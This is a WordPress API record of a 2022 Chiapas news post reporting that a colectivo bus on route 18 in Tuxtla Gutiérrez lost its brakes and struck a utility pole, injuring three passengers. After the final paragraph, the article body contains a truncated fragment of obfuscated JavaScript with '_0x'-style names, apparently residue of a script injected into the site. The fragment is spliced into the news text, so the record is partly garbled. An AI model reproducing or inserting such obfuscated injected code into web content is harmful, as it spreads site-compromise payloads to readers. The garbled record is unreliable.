{"id":4497,"date":"2022-08-17T21:58:33","date_gmt":"2022-08-17T21:58:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4497"},"modified":"2022-08-17T21:58:34","modified_gmt":"2022-08-17T21:58:34","slug":"unidad-de-transporte-colectivo-choca-contra-poste","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4497","title":{"rendered":"Unidad de transporte colectivo choca contra poste"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"606\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660773189663-1024x606.jpg\" alt=\"\" class=\"wp-image-4498\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660773189663-1024x606.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660773189663-300x178.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660773189663-768x454.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660773189663.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 17 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana, una unidad de transporte p\u00fablico en la modalidad de colectivo de la ruta 18 con n\u00famero econ\u00f3mico 07 se estrell\u00f3 contra un poste.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este accidente ocurri\u00f3 cuando la unidad circulaba en la Avenida Nogal y al llegar a la calle Azucenas el conductor perdi\u00f3 el control y not\u00f3 que los frenos no le respond\u00edan.<\/p>\n\n\n\n<p>Al tratar de no perder el control de la unidad el ch\u00f3fer se orill\u00f3 y termin\u00f3 estampado contra el poste de CFE.<\/p>\n\n\n\n<p>Por el impacto tres pasajeros resultaron heridos, de los cuales dos fueron trasladados a un nosocomio por param\u00e9dicos de la CRM.<\/p>\n\n\n\n<p>Al lugar arrib\u00f3 un agente de seguros para atender la situaci\u00f3n y mediar con los lesionados mientras que la unidad fue trasladada a un corral\u00f3n en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 17 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana, una unidad de transporte p\u00fablico en la modalidad de colectivo de la ruta 18 con n\u00famero econ\u00f3mico 07 se estrell\u00f3 contra un poste. Los reportes oficiales informaron que, este accidente ocurri\u00f3 cuando la unidad circulaba en la Avenida &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4498,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4497","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4497","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4497"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4497\/revisions"}],"predecessor-version":[{"id":4499,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4497\/revisions\/4499"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4498"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4497"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4497"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4497"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}